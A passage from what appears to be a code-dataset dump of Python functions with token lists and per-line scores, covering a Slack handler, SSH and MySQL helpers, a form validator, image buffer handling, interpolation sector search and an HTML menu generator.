"text",
"=",
"text",
",",
"user_name",
"=",
"user_name",
")",
")",
"# Reply with nothing (as the external message does more)",
"return",
"''"
] | 38.575758 | [
0.05,
0.0375,
0.06666666666666667,
0.11764705882352941,
0.10526315789473684,
0.08,
0.08695652173913043,
0.08695652173913043,
0.1,
0.09523809523809523,
0.09090909090909091,
0.125,
0,
0.06060606060606061,
0.045454545454545456,
0.043010752688172046,
0.05,
0,
0.05263157894736842,
0.06451612903225806,
0.04878048780487805,
0.036585365853658534,
0.0425531914893617,
0.031578947368421054,
0,
0.0425531914893617,
0.06666666666666667,
0.04819277108433735,
0.060240963855421686,
0.05194805194805195,
0,
0.03333333333333333,
0.15384615384615385
] |
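A hedged test request for the `slack_message` route above, posting the slash-command fields the handler reads; the local URL and the route path are assumptions, and SLACK_TOKEN must match the server's.

import requests

resp = requests.post('http://localhost:5000/slack', data={
    'token': SLACK_TOKEN,  # a mismatch yields the 403 branch
    'text': 'Buy milk',
    'user_name': 'steve',
    'channel_name': 'test',
})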
def poll(self):
"""
Get, and remove, the first (lowest) item from this queue.
:return: the first (lowest) item from this queue.
:rtype: Point, Event pair.
"""
assert(len(self.events_scan) != 0)
p, events_current = self.events_scan.pop_min()
return p, events_current | [
"def",
"poll",
"(",
"self",
")",
":",
"assert",
"(",
"len",
"(",
"self",
".",
"events_scan",
")",
"!=",
"0",
")",
"p",
",",
"events_current",
"=",
"self",
".",
"events_scan",
".",
"pop_min",
"(",
")",
"return",
"p",
",",
"events_current"
] | 32.1 | [
0.06666666666666667,
0.18181818181818182,
0.046153846153846156,
0,
0.07017543859649122,
0.08823529411764706,
0.18181818181818182,
0.047619047619047616,
0.037037037037037035,
0.0625
] |
def connect_ssh(*args, **kwargs):
"""
Create a new connected :class:`SSHClient` instance. All arguments
are passed to :meth:`SSHClient.connect`.
"""
client = SSHClient()
client.connect(*args, **kwargs)
return client | [
"def",
"connect_ssh",
"(",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"client",
"=",
"SSHClient",
"(",
")",
"client",
".",
"connect",
"(",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
"return",
"client"
] | 29.333333 | [
0.030303030303030304,
0.18181818181818182,
0.0821917808219178,
0.125,
0.18181818181818182,
0,
0.07142857142857142,
0.05128205128205128,
0.09523809523809523
] |
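An illustrative call for the `connect_ssh` wrapper above, assuming paramiko-style connect arguments; the host and credentials are placeholders.

client = connect_ssh('gateway.example.com', username='deploy', password='secret')
stdin, stdout, stderr = client.exec_command('uptime')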
def file_map(path, instructions, **kw):
'''
file_map(path, instructions) yields a file-map object for the given path and instruction-set.
file_map(None, instructions) yields a lambda of exactly one argument that is equivalent to the
following: lambda p: file_map(p, instructions)
File-map objects are pimms immutable objects that combine a format-spec for a directory
(instructions) with a directory to yield a lazily-loaded data object. The format-spec is not
currently documented, but interested users should see the variable
neuropythy.hcp.files.hcp_filemap_instructions.
The following options can be given:
* path_parameters (default: None) may be set to a map of parameters that are used to format the
filenames in the instructions.
* data_hierarchy (default: None) may specify how the data should be nested; see the variable
neuropythy.hcp.files.hcp_filemap_data_hierarchy.
* load_function (default: None) may specify the function that is used to load filenames; if
None then neuropythy.io.load is used.
* meta_data (default: None) may be passed on to the FileMap object.
Any additional keyword arguments given to the file_map function will be used as supplemental
paths.
'''
if path: return FileMap(path, instructions, **kw)
else: return lambda path:file_map(path, instructions, **kw) | [
"def",
"file_map",
"(",
"path",
",",
"instructions",
",",
"*",
"*",
"kw",
")",
":",
"if",
"path",
":",
"return",
"FileMap",
"(",
"path",
",",
"instructions",
",",
"*",
"*",
"kw",
")",
"else",
":",
"return",
"lambda",
"path",
":",
"file_map",
"(",
"path",
",",
"instructions",
",",
"*",
"*",
"kw",
")"
] | 55.28 | [
0.02564102564102564,
0.2857142857142857,
0.030927835051546393,
0.030612244897959183,
0.07547169811320754,
0.5,
0.043478260869565216,
0.03125,
0.02857142857142857,
0.04,
0.5,
0.05128205128205128,
0.05,
0.08108108108108109,
0.061855670103092786,
0.05454545454545454,
0.0625,
0.06818181818181818,
0.05555555555555555,
0,
0.03125,
0.2,
0.2857142857142857,
0.05660377358490566,
0.07575757575757576
] |
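Both calling conventions from the file_map() docstring, side by side. The instruction set below is an empty placeholder; a real spec such as neuropythy.hcp.files.hcp_filemap_instructions would be needed for the resulting map to be useful:

instructions = {}  # placeholder for a real format-spec

# Curried form: file_map(None, instructions) returns a one-argument lambda.
make_map = file_map(None, instructions)

# Calling the lambda is equivalent to the direct form
# file_map('/data/subject1', instructions); the path is hypothetical.
fm = make_map('/data/subject1')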
def no_company_with_insufficient_companies_house_data(value):
"""
Confirms that the company number is not for a company that
Companies House does not hold information on.
Args:
value (string): The company number to check.
Raises:
django.forms.ValidationError
"""
for prefix, name in company_types_with_insufficient_companies_house_data:
if value.upper().startswith(prefix):
raise ValidationError(
MESSAGE_INSUFFICIENT_DATA, params={'name': name}
) | [
"def",
"no_company_with_insufficient_companies_house_data",
"(",
"value",
")",
":",
"for",
"prefix",
",",
"name",
"in",
"company_types_with_insufficient_companies_house_data",
":",
"if",
"value",
".",
"upper",
"(",
")",
".",
"startswith",
"(",
"prefix",
")",
":",
"raise",
"ValidationError",
"(",
"MESSAGE_INSUFFICIENT_DATA",
",",
"params",
"=",
"{",
"'name'",
":",
"name",
"}",
")"
] | 29.444444 | [
0.01639344262295082,
0.2857142857142857,
0.030303030303030304,
0.04081632653061224,
0,
0.2222222222222222,
0.057692307692307696,
0,
0.18181818181818182,
0.05555555555555555,
0,
0.2857142857142857,
0,
0.025974025974025976,
0.045454545454545456,
0.08823529411764706,
0.046875,
0.23076923076923078
] |
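A minimal usage sketch for the validator. The 'IP' prefix is hypothetical; real prefixes come from company_types_with_insufficient_companies_house_data, which is assumed to hold (prefix, name) pairs:

from django.forms import ValidationError

try:
    no_company_with_insufficient_companies_house_data('IP123456')  # made-up number
except ValidationError as exc:
    print(exc.messages)  # interpolated MESSAGE_INSUFFICIENT_DATA text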
def redefineBuffer(self, newBuffer):
"""!
\~english
Redefine the frame of the screen
@param newBuffer: new frame data
@note
newBuffer can be:
* PIL Image
* PIL ImageFile
* Dictionary, eg. { "size":(width, height), "color_mode":"1" } or { "size":(width, height), "color_mode":"RGB" }
\~chinese
Redefine the buffer data
@param newBuffer: new buffer data \n
newBuffer can be one of the following values:
* PIL Image
* PIL ImageFile
* Dictionary, eg. { "size":(width, height), "color_mode":"1" } or { "size":(width, height), "color_mode":"RGB" }
"""
# Redefine Frame from an image object
if type(self._buffer) == type(newBuffer):
self._buffer = newBuffer
self.Canvas = ImageDraw.Draw( self._buffer )
# self.View.resize(newBuffer.width, newBuffer.height)
return True
# Redefine Frame from an <PIL.ImageFile.ImageFile>
if type(newBuffer).__name__.find(PIL.ImageFile.ImageFile.__name__) != -1:
self._buffer = self._buffer.resize((newBuffer.width, newBuffer.height))
self._buffer.paste( newBuffer, (0,0))
# self.View.resize(newBuffer.width, newBuffer.height)
return True
# Recreate a new frame from a dict spec
if isinstance(newBuffer, dict):
self._buffer = Image.new( newBuffer["color_mode"] , newBuffer["size"] )
self.Canvas = ImageDraw.Draw( self._buffer )
return True
pass | [
"def",
"redefineBuffer",
"(",
"self",
",",
"newBuffer",
")",
":",
"# Redefine Frame from an image object",
"if",
"type",
"(",
"self",
".",
"_buffer",
")",
"==",
"type",
"(",
"newBuffer",
")",
":",
"self",
".",
"_buffer",
"=",
"newBuffer",
"self",
".",
"Canvas",
"=",
"ImageDraw",
".",
"Draw",
"(",
"self",
".",
"_buffer",
")",
"# self.View.resize(newBuffer.width, newBuffer.height)",
"return",
"True",
"# Redefine Frame from an <PIL.ImageFile.ImageFile>",
"if",
"type",
"(",
"newBuffer",
")",
".",
"__name__",
".",
"find",
"(",
"PIL",
".",
"ImageFile",
".",
"ImageFile",
".",
"__name__",
")",
"!=",
"-",
"1",
":",
"self",
".",
"_buffer",
"=",
"self",
".",
"_buffer",
".",
"resize",
"(",
"(",
"newBuffer",
".",
"width",
",",
"newBuffer",
".",
"height",
")",
")",
"self",
".",
"_buffer",
".",
"paste",
"(",
"newBuffer",
",",
"(",
"0",
",",
"0",
")",
")",
"# self.View.resize(newBuffer.width, newBuffer.height)",
"return",
"True",
"# Recreated a new frame from dict of frame",
"if",
"isinstance",
"(",
"newBuffer",
",",
"dict",
")",
":",
"self",
".",
"_buffer",
"=",
"Image",
".",
"new",
"(",
"newBuffer",
"[",
"\"color_mode\"",
"]",
",",
"newBuffer",
"[",
"\"size\"",
"]",
")",
"self",
".",
"Canvas",
"=",
"ImageDraw",
".",
"Draw",
"(",
"self",
".",
"_buffer",
")",
"return",
"True",
"pass"
] | 39.230769 | [
0.05405405405405406,
0.16666666666666666,
0.16666666666666666,
0.0625,
0.05,
0.15384615384615385,
0.07142857142857142,
0.08695652173913043,
0.07407407407407407,
0.08870967741935484,
0,
0.11764705882352941,
0.125,
0.06060606060606061,
0.07142857142857142,
0.08695652173913043,
0.07407407407407407,
0.10256410256410256,
0.18181818181818182,
0.044444444444444446,
0.04081632653061224,
0.05555555555555555,
0.07142857142857142,
0.015384615384615385,
0.08695652173913043,
0,
0.034482758620689655,
0.0449438202247191,
0.03614457831325301,
0.08163265306122448,
0.015384615384615385,
0.08695652173913043,
0,
0.04,
0.05128205128205128,
0.07228915662650602,
0.07142857142857142,
0.08695652173913043,
0.16666666666666666
] |
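The dictionary branch of redefineBuffer(), demonstrated standalone: the {"size", "color_mode"} spec becomes a fresh PIL buffer plus a drawing canvas. Only Pillow is required:

from PIL import Image, ImageDraw

spec = {"size": (128, 64), "color_mode": "1"}
buffer = Image.new(spec["color_mode"], spec["size"])  # what the dict branch does
canvas = ImageDraw.Draw(buffer)
print(buffer.size, buffer.mode)  # -> (128, 64) 1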
def findSector(self,x,y):
'''
Finds the quadrilateral "sector" for each (x,y) point in the input.
Only called as a subroutine of _evaluate().
Parameters
----------
x : np.array
Values whose sector should be found.
y : np.array
Values whose sector should be found. Should be same size as x.
Returns
-------
x_pos : np.array
Sector x-coordinates for each point of the input, of the same size.
y_pos : np.array
Sector y-coordinates for each point of the input, of the same size.
'''
# Initialize the sector guess
m = x.size
x_pos_guess = (np.ones(m)*self.x_n/2).astype(int)
y_pos_guess = (np.ones(m)*self.y_n/2).astype(int)
# Define a function that checks whether a set of points violates a linear
# boundary defined by (x_bound_1,y_bound_1) and (x_bound_2,y_bound_2),
# where the latter is *COUNTER CLOCKWISE* from the former. Returns
# 1 if the point is outside the boundary and 0 otherwise.
violationCheck = lambda x_check,y_check,x_bound_1,y_bound_1,x_bound_2,y_bound_2 : (
(y_bound_2 - y_bound_1)*x_check - (x_bound_2 - x_bound_1)*y_check > x_bound_1*y_bound_2 - y_bound_1*x_bound_2 ) + 0
# Identify the correct sector for each point to be evaluated
these = np.ones(m,dtype=bool)
max_loops = self.x_n + self.y_n
loops = 0
while np.any(these) and loops < max_loops:
# Get coordinates for the four vertices: (xA,yA),...,(xD,yD)
x_temp = x[these]
y_temp = y[these]
xA = self.x_values[x_pos_guess[these],y_pos_guess[these]]
xB = self.x_values[x_pos_guess[these]+1,y_pos_guess[these]]
xC = self.x_values[x_pos_guess[these],y_pos_guess[these]+1]
xD = self.x_values[x_pos_guess[these]+1,y_pos_guess[these]+1]
yA = self.y_values[x_pos_guess[these],y_pos_guess[these]]
yB = self.y_values[x_pos_guess[these]+1,y_pos_guess[these]]
yC = self.y_values[x_pos_guess[these],y_pos_guess[these]+1]
yD = self.y_values[x_pos_guess[these]+1,y_pos_guess[these]+1]
# Check the "bounding box" for the sector: is this guess plausible?
move_down = (y_temp < np.minimum(yA,yB)) + 0
move_right = (x_temp > np.maximum(xB,xD)) + 0
move_up = (y_temp > np.maximum(yC,yD)) + 0
move_left = (x_temp < np.minimum(xA,xC)) + 0
# Check which boundaries are violated (and thus where to look next)
c = (move_down + move_right + move_up + move_left) == 0
move_down[c] = violationCheck(x_temp[c],y_temp[c],xA[c],yA[c],xB[c],yB[c])
move_right[c] = violationCheck(x_temp[c],y_temp[c],xB[c],yB[c],xD[c],yD[c])
move_up[c] = violationCheck(x_temp[c],y_temp[c],xD[c],yD[c],xC[c],yC[c])
move_left[c] = violationCheck(x_temp[c],y_temp[c],xC[c],yC[c],xA[c],yA[c])
# Update the sector guess based on the violations
x_pos_next = x_pos_guess[these] - move_left + move_right
x_pos_next[x_pos_next < 0] = 0
x_pos_next[x_pos_next > (self.x_n-2)] = self.x_n-2
y_pos_next = y_pos_guess[these] - move_down + move_up
y_pos_next[y_pos_next < 0] = 0
y_pos_next[y_pos_next > (self.y_n-2)] = self.y_n-2
# Check which sectors have not changed, and mark them as complete
no_move = np.array(np.logical_and(x_pos_guess[these] == x_pos_next, y_pos_guess[these] == y_pos_next))
x_pos_guess[these] = x_pos_next
y_pos_guess[these] = y_pos_next
temp = these.nonzero()
these[temp[0][no_move]] = False
# Move to the next iteration of the search
loops += 1
# Return the output
x_pos = x_pos_guess
y_pos = y_pos_guess
return x_pos, y_pos | [
"def",
"findSector",
"(",
"self",
",",
"x",
",",
"y",
")",
":",
"# Initialize the sector guess",
"m",
"=",
"x",
".",
"size",
"x_pos_guess",
"=",
"(",
"np",
".",
"ones",
"(",
"m",
")",
"*",
"self",
".",
"x_n",
"/",
"2",
")",
".",
"astype",
"(",
"int",
")",
"y_pos_guess",
"=",
"(",
"np",
".",
"ones",
"(",
"m",
")",
"*",
"self",
".",
"y_n",
"/",
"2",
")",
".",
"astype",
"(",
"int",
")",
"# Define a function that checks whether a set of points violates a linear",
"# boundary defined by (x_bound_1,y_bound_1) and (x_bound_2,y_bound_2),",
"# where the latter is *COUNTER CLOCKWISE* from the former. Returns",
"# 1 if the point is outside the boundary and 0 otherwise.",
"violationCheck",
"=",
"lambda",
"x_check",
",",
"y_check",
",",
"x_bound_1",
",",
"y_bound_1",
",",
"x_bound_2",
",",
"y_bound_2",
":",
"(",
"(",
"y_bound_2",
"-",
"y_bound_1",
")",
"*",
"x_check",
"-",
"(",
"x_bound_2",
"-",
"x_bound_1",
")",
"*",
"y_check",
">",
"x_bound_1",
"*",
"y_bound_2",
"-",
"y_bound_1",
"*",
"x_bound_2",
")",
"+",
"0",
"# Identify the correct sector for each point to be evaluated",
"these",
"=",
"np",
".",
"ones",
"(",
"m",
",",
"dtype",
"=",
"bool",
")",
"max_loops",
"=",
"self",
".",
"x_n",
"+",
"self",
".",
"y_n",
"loops",
"=",
"0",
"while",
"np",
".",
"any",
"(",
"these",
")",
"and",
"loops",
"<",
"max_loops",
":",
"# Get coordinates for the four vertices: (xA,yA),...,(xD,yD)",
"x_temp",
"=",
"x",
"[",
"these",
"]",
"y_temp",
"=",
"y",
"[",
"these",
"]",
"xA",
"=",
"self",
".",
"x_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
",",
"y_pos_guess",
"[",
"these",
"]",
"]",
"xB",
"=",
"self",
".",
"x_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
"+",
"1",
",",
"y_pos_guess",
"[",
"these",
"]",
"]",
"xC",
"=",
"self",
".",
"x_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
",",
"y_pos_guess",
"[",
"these",
"]",
"+",
"1",
"]",
"xD",
"=",
"self",
".",
"x_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
"+",
"1",
",",
"y_pos_guess",
"[",
"these",
"]",
"+",
"1",
"]",
"yA",
"=",
"self",
".",
"y_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
",",
"y_pos_guess",
"[",
"these",
"]",
"]",
"yB",
"=",
"self",
".",
"y_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
"+",
"1",
",",
"y_pos_guess",
"[",
"these",
"]",
"]",
"yC",
"=",
"self",
".",
"y_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
",",
"y_pos_guess",
"[",
"these",
"]",
"+",
"1",
"]",
"yD",
"=",
"self",
".",
"y_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
"+",
"1",
",",
"y_pos_guess",
"[",
"these",
"]",
"+",
"1",
"]",
"# Check the \"bounding box\" for the sector: is this guess plausible?",
"move_down",
"=",
"(",
"y_temp",
"<",
"np",
".",
"minimum",
"(",
"yA",
",",
"yB",
")",
")",
"+",
"0",
"move_right",
"=",
"(",
"x_temp",
">",
"np",
".",
"maximum",
"(",
"xB",
",",
"xD",
")",
")",
"+",
"0",
"move_up",
"=",
"(",
"y_temp",
">",
"np",
".",
"maximum",
"(",
"yC",
",",
"yD",
")",
")",
"+",
"0",
"move_left",
"=",
"(",
"x_temp",
"<",
"np",
".",
"minimum",
"(",
"xA",
",",
"xC",
")",
")",
"+",
"0",
"# Check which boundaries are violated (and thus where to look next)",
"c",
"=",
"(",
"move_down",
"+",
"move_right",
"+",
"move_up",
"+",
"move_left",
")",
"==",
"0",
"move_down",
"[",
"c",
"]",
"=",
"violationCheck",
"(",
"x_temp",
"[",
"c",
"]",
",",
"y_temp",
"[",
"c",
"]",
",",
"xA",
"[",
"c",
"]",
",",
"yA",
"[",
"c",
"]",
",",
"xB",
"[",
"c",
"]",
",",
"yB",
"[",
"c",
"]",
")",
"move_right",
"[",
"c",
"]",
"=",
"violationCheck",
"(",
"x_temp",
"[",
"c",
"]",
",",
"y_temp",
"[",
"c",
"]",
",",
"xB",
"[",
"c",
"]",
",",
"yB",
"[",
"c",
"]",
",",
"xD",
"[",
"c",
"]",
",",
"yD",
"[",
"c",
"]",
")",
"move_up",
"[",
"c",
"]",
"=",
"violationCheck",
"(",
"x_temp",
"[",
"c",
"]",
",",
"y_temp",
"[",
"c",
"]",
",",
"xD",
"[",
"c",
"]",
",",
"yD",
"[",
"c",
"]",
",",
"xC",
"[",
"c",
"]",
",",
"yC",
"[",
"c",
"]",
")",
"move_left",
"[",
"c",
"]",
"=",
"violationCheck",
"(",
"x_temp",
"[",
"c",
"]",
",",
"y_temp",
"[",
"c",
"]",
",",
"xC",
"[",
"c",
"]",
",",
"yC",
"[",
"c",
"]",
",",
"xA",
"[",
"c",
"]",
",",
"yA",
"[",
"c",
"]",
")",
"# Update the sector guess based on the violations",
"x_pos_next",
"=",
"x_pos_guess",
"[",
"these",
"]",
"-",
"move_left",
"+",
"move_right",
"x_pos_next",
"[",
"x_pos_next",
"<",
"0",
"]",
"=",
"0",
"x_pos_next",
"[",
"x_pos_next",
">",
"(",
"self",
".",
"x_n",
"-",
"2",
")",
"]",
"=",
"self",
".",
"x_n",
"-",
"2",
"y_pos_next",
"=",
"y_pos_guess",
"[",
"these",
"]",
"-",
"move_down",
"+",
"move_up",
"y_pos_next",
"[",
"y_pos_next",
"<",
"0",
"]",
"=",
"0",
"y_pos_next",
"[",
"y_pos_next",
">",
"(",
"self",
".",
"y_n",
"-",
"2",
")",
"]",
"=",
"self",
".",
"y_n",
"-",
"2",
"# Check which sectors have not changed, and mark them as complete",
"no_move",
"=",
"np",
".",
"array",
"(",
"np",
".",
"logical_and",
"(",
"x_pos_guess",
"[",
"these",
"]",
"==",
"x_pos_next",
",",
"y_pos_guess",
"[",
"these",
"]",
"==",
"y_pos_next",
")",
")",
"x_pos_guess",
"[",
"these",
"]",
"=",
"x_pos_next",
"y_pos_guess",
"[",
"these",
"]",
"=",
"y_pos_next",
"temp",
"=",
"these",
".",
"nonzero",
"(",
")",
"these",
"[",
"temp",
"[",
"0",
"]",
"[",
"no_move",
"]",
"]",
"=",
"False",
"# Move to the next iteration of the search",
"loops",
"+=",
"1",
"# Return the output",
"x_pos",
"=",
"x_pos_guess",
"y_pos",
"=",
"y_pos_guess",
"return",
"x_pos",
",",
"y_pos"
] | 47.39759 | [
0.12,
0.18181818181818182,
0.05333333333333334,
0.0392156862745098,
0,
0.1111111111111111,
0.1111111111111111,
0.15,
0.041666666666666664,
0.15,
0.02666666666666667,
0,
0.13333333333333333,
0.13333333333333333,
0.125,
0.02531645569620253,
0.125,
0.02531645569620253,
0.18181818181818182,
0.05405405405405406,
0.1111111111111111,
0.03508771929824561,
0.03508771929824561,
0,
0.037037037037037035,
0.02564102564102564,
0.02666666666666667,
0.03076923076923077,
0.12087912087912088,
0.03937007874015748,
0,
0.029411764705882353,
0.08108108108108109,
0.05128205128205128,
0.11764705882352941,
0.04,
0.027777777777777776,
0.06896551724137931,
0.06896551724137931,
0.043478260869565216,
0.04225352112676056,
0.04225352112676056,
0.0410958904109589,
0.043478260869565216,
0.04225352112676056,
0.04225352112676056,
0.0410958904109589,
0,
0.02531645569620253,
0.05357142857142857,
0.05263157894736842,
0.05555555555555555,
0.05357142857142857,
0,
0.02531645569620253,
0.029850746268656716,
0.09302325581395349,
0.09195402298850575,
0.09523809523809523,
0.09302325581395349,
0,
0.03278688524590164,
0.029411764705882353,
0.047619047619047616,
0.03225806451612903,
0.03076923076923077,
0.047619047619047616,
0.03225806451612903,
0,
0.025974025974025976,
0.02631578947368421,
0.046511627906976744,
0.046511627906976744,
0.058823529411764705,
0.046511627906976744,
0,
0.037037037037037035,
0.09090909090909091,
0,
0.07407407407407407,
0.07407407407407407,
0.07407407407407407,
0.07407407407407407
] |
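The heart of findSector() is the counter-clockwise boundary test: a point violates a directed edge (x1,y1) -> (x2,y2) exactly when the cross-product inequality below holds, and the trailing + 0 converts the boolean mask into integer move flags. A standalone check of that lambda, with made-up points:

import numpy as np

def violation_check(x, y, x1, y1, x2, y2):
    # 1 where the point lies outside the directed edge, 0 otherwise.
    return ((y2 - y1) * x - (x2 - x1) * y > x1 * y2 - y1 * x2) + 0

x = np.array([0.5, 2.0])
y = np.array([0.5, -1.0])
# Bottom edge from (0, 0) to (1, 0): only points below it violate it,
# which is what triggers move_down in the sector search.
print(violation_check(x, y, 0.0, 0.0, 1.0, 0.0))  # -> [0 1]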
def db_remove(name, **connection_args):
'''
Removes a database from the MySQL server.
CLI Example:
.. code-block:: bash
salt '*' mysql.db_remove 'dbname'
'''
# check if db exists
if not db_exists(name, **connection_args):
log.info('DB \'%s\' does not exist', name)
return False
if name in ('mysql', 'information_schema'):
log.info('DB \'%s\' may not be removed', name)
return False
# db does exist, proceed
dbc = _connect(**connection_args)
if dbc is None:
return False
cur = dbc.cursor()
s_name = quote_identifier(name)
# identifiers cannot be used as values
qry = 'DROP DATABASE {0};'.format(s_name)
try:
_execute(cur, qry)
except MySQLdb.OperationalError as exc:
err = 'MySQL Error {0}: {1}'.format(*exc.args)
__context__['mysql.error'] = err
log.error(err)
return False
if not db_exists(name, **connection_args):
log.info('Database \'%s\' has been removed', name)
return True
log.info('Database \'%s\' has not been removed', name)
return False | [
"def",
"db_remove",
"(",
"name",
",",
"*",
"*",
"connection_args",
")",
":",
"# check if db exists",
"if",
"not",
"db_exists",
"(",
"name",
",",
"*",
"*",
"connection_args",
")",
":",
"log",
".",
"info",
"(",
"'DB \\'%s\\' does not exist'",
",",
"name",
")",
"return",
"False",
"if",
"name",
"in",
"(",
"'mysql'",
",",
"'information_scheme'",
")",
":",
"log",
".",
"info",
"(",
"'DB \\'%s\\' may not be removed'",
",",
"name",
")",
"return",
"False",
"# db does exists, proceed",
"dbc",
"=",
"_connect",
"(",
"*",
"*",
"connection_args",
")",
"if",
"dbc",
"is",
"None",
":",
"return",
"False",
"cur",
"=",
"dbc",
".",
"cursor",
"(",
")",
"s_name",
"=",
"quote_identifier",
"(",
"name",
")",
"# identifiers cannot be used as values",
"qry",
"=",
"'DROP DATABASE {0};'",
".",
"format",
"(",
"s_name",
")",
"try",
":",
"_execute",
"(",
"cur",
",",
"qry",
")",
"except",
"MySQLdb",
".",
"OperationalError",
"as",
"exc",
":",
"err",
"=",
"'MySQL Error {0}: {1}'",
".",
"format",
"(",
"*",
"exc",
".",
"args",
")",
"__context__",
"[",
"'mysql.error'",
"]",
"=",
"err",
"log",
".",
"error",
"(",
"err",
")",
"return",
"False",
"if",
"not",
"db_exists",
"(",
"name",
",",
"*",
"*",
"connection_args",
")",
":",
"log",
".",
"info",
"(",
"'Database \\'%s\\' has been removed'",
",",
"name",
")",
"return",
"True",
"log",
".",
"info",
"(",
"'Database \\'%s\\' has not been removed'",
",",
"name",
")",
"return",
"False"
] | 26.829268 | [
0.02564102564102564,
0.2857142857142857,
0.043478260869565216,
0,
0.125,
0,
0.125,
0,
0.04878048780487805,
0.2857142857142857,
0.08333333333333333,
0.043478260869565216,
0.04,
0.1,
0,
0.0425531914893617,
0.037037037037037035,
0.1,
0,
0.06896551724137931,
0.05405405405405406,
0.10526315789473684,
0.1,
0.09090909090909091,
0.05714285714285714,
0.047619047619047616,
0.044444444444444446,
0.25,
0.07692307692307693,
0.046511627906976744,
0.037037037037037035,
0.05,
0.09090909090909091,
0.1,
0,
0.043478260869565216,
0.034482758620689655,
0.10526315789473684,
0,
0.034482758620689655,
0.125
] |
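Why db_remove() formats the database name into the query instead of binding it: DB-API placeholders can only carry values, never identifiers, so the name must be quoted and interpolated. A sketch of the same pattern with a hypothetical quote_identifier(); salt's real helper may escape differently:

def quote_identifier(name):
    # Assumed behaviour: backtick-quote and double any embedded backticks.
    return '`' + name.replace('`', '``') + '`'

qry = 'DROP DATABASE {0};'.format(quote_identifier('app_db'))
print(qry)  # -> DROP DATABASE `app_db`;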
def html_index(self,launch=False,showChildren=False):
"""
Generate a list of cells with links. Keep this simple.
Automatically generates the splash page and regenerates frames.
"""
self.makePics() # ensure all pics are converted
# generate menu
html='<a href="index_splash.html" target="content">./%s/</a><br>'%os.path.basename(self.abfFolder)
for ID in smartSort(self.fnamesByCell.keys()):
link=''
if ID+".html" in self.fnames2:
link='href="%s.html" target="content"'%ID
html+=('<a %s>%s</a><br>'%(link,ID)) # show the parent ABF (ID)
if showChildren:
for fname in self.fnamesByCell[ID]:
thisID=os.path.splitext(fname)[0]
files2=[x for x in self.fnames2 if x.startswith(thisID) and not x.endswith(".html")]
html+='<i>%s</i>'%thisID # show the child ABF
if len(files2):
html+=' (%s)'%len(files2) # show number of supporting files
html+='<br>'
html+="<br>"
style.save(html,self.abfFolder2+"/index_menu.html")
self.html_index_splash() # make splash page
style.frames(self.abfFolder2+"/index.html",launch=launch) | [
"def",
"html_index",
"(",
"self",
",",
"launch",
"=",
"False",
",",
"showChildren",
"=",
"False",
")",
":",
"self",
".",
"makePics",
"(",
")",
"# ensure all pics are converted",
"# generate menu",
"html",
"=",
"'<a href=\"index_splash.html\" target=\"content\">./%s/</a><br>'",
"%",
"os",
".",
"path",
".",
"basename",
"(",
"self",
".",
"abfFolder",
")",
"for",
"ID",
"in",
"smartSort",
"(",
"self",
".",
"fnamesByCell",
".",
"keys",
"(",
")",
")",
":",
"link",
"=",
"''",
"if",
"ID",
"+",
"\".html\"",
"in",
"self",
".",
"fnames2",
":",
"link",
"=",
"'href=\"%s.html\" target=\"content\"'",
"%",
"ID",
"html",
"+=",
"(",
"'<a %s>%s</a><br>'",
"%",
"(",
"link",
",",
"ID",
")",
")",
"# show the parent ABF (ID)",
"if",
"showChildren",
":",
"for",
"fname",
"in",
"self",
".",
"fnamesByCell",
"[",
"ID",
"]",
":",
"thisID",
"=",
"os",
".",
"path",
".",
"splitext",
"(",
"fname",
")",
"[",
"0",
"]",
"files2",
"=",
"[",
"x",
"for",
"x",
"in",
"self",
".",
"fnames2",
"if",
"x",
".",
"startswith",
"(",
"thisID",
")",
"and",
"not",
"x",
".",
"endswith",
"(",
"\".html\"",
")",
"]",
"html",
"+=",
"'<i>%s</i>'",
"%",
"thisID",
"# show the child ABF",
"if",
"len",
"(",
"files2",
")",
":",
"html",
"+=",
"' (%s)'",
"%",
"len",
"(",
"files2",
")",
"# show number of supporting files",
"html",
"+=",
"'<br>'",
"html",
"+=",
"\"<br>\"",
"style",
".",
"save",
"(",
"html",
",",
"self",
".",
"abfFolder2",
"+",
"\"/index_menu.html\"",
")",
"self",
".",
"html_index_splash",
"(",
")",
"# make splash page",
"style",
".",
"frames",
"(",
"self",
".",
"abfFolder2",
"+",
"\"/index.html\"",
",",
"launch",
"=",
"launch",
")"
] | 51.44 | [
0.05660377358490566,
0.18181818181818182,
0.03333333333333333,
0.030303030303030304,
0.18181818181818182,
0.05454545454545454,
0.08695652173913043,
0.04716981132075472,
0.037037037037037035,
0.15789473684210525,
0.047619047619047616,
0.07017543859649122,
0.08,
0.07142857142857142,
0.0392156862745098,
0.05660377358490566,
0.038461538461538464,
0.07692307692307693,
0.05714285714285714,
0.07228915662650602,
0.09375,
0.10714285714285714,
0.05084745762711865,
0.058823529411764705,
0.046153846153846156
] |
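The menu-building pattern from html_index(), reduced to its core: one anchor per parent ID, each targeting the "content" frame. The IDs are made up, and sorted() stands in for smartSort():

ids = ["17o05026", "17o05027"]  # hypothetical parent ABF IDs
html = '<a href="index_splash.html" target="content">menu</a><br>'
for ID in sorted(ids):  # stand-in for smartSort()
    html += '<a href="%s.html" target="content">%s</a><br>' % (ID, ID)
print(html)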
async def apply_command(self, cmd):
"""
applies a command
This calls the pre and post hooks attached to the command,
as well as :meth:`cmd.apply`.
:param cmd: an applicable command
:type cmd: :class:`~alot.commands.Command`
"""
# FIXME: What are we guarding for here? We don't mention that None is
# allowed as a value for cmd.
if cmd:
if cmd.prehook:
await cmd.prehook(ui=self, dbm=self.dbman, cmd=cmd)
try:
if asyncio.iscoroutinefunction(cmd.apply):
await cmd.apply(self)
else:
cmd.apply(self)
except Exception as e:
self._error_handler(e)
else:
if cmd.posthook:
logging.info('calling post-hook')
await cmd.posthook(ui=self, dbm=self.dbman, cmd=cmd) | [
"async",
"def",
"apply_command",
"(",
"self",
",",
"cmd",
")",
":",
"# FIXME: What are we guarding for here? We don't mention that None is",
"# allowed as a value fo cmd.",
"if",
"cmd",
":",
"if",
"cmd",
".",
"prehook",
":",
"await",
"cmd",
".",
"prehook",
"(",
"ui",
"=",
"self",
",",
"dbm",
"=",
"self",
".",
